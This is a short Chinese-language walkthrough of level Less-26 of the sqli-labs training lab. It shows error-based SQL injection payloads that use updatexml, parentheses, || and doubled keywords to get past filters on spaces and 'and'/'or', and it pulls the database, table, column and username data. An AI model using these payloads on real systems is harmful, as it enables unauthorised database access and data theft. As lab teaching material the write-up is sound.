sqli-less-26-less26a

less-26 单引号 GET型

这关就有点过滤的意思了，过滤了上一关的东西，并且把空格和%23给过滤了。如果是ubuntu的话，可以用/**/，%0a等绕过，方便一些。但我的是windows，所以就只能用（）了。让后使用||来代替and，用‘1来闭合。
数据库：

-1’ || updatexml(1,concat(0x7e,(database()),0x7e),1)||'1

表：

1’||updatexml(1,concat(0x7e(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)=database()),0x7e),1)||'1

字段：

-1’ ||updatexml(1,concat(0x7e,(select (group_concat(column_name)) from (inFoorrmation_schema.columns) where
(table_name)=‘users’%26%26(table_schema=database())),0x7e),1) || '1
注：%26的url码代表的是&

数据：这里有一个知识点，因为要绕过空格，所以limit 就不能用了，但是updatexml（）只能爆32位，如果要爆的数据过多，就没有办法了。所以我们这里再使用一个在盲注中用过的函数 substr()，用法我就不讲了，基本用法应该都知道了。

从第一位到第32位： -1’ ||updatexml(1,substr(concat(0x7e,(select (group_concat(username)) from (users)),0x7e),1,32),1)||'1

从33位到64位：-1’ ||updatexml(1,substr(concat(0x7e,(select (group_concat(username)) from (users)),0x7e),33,64),1)||'1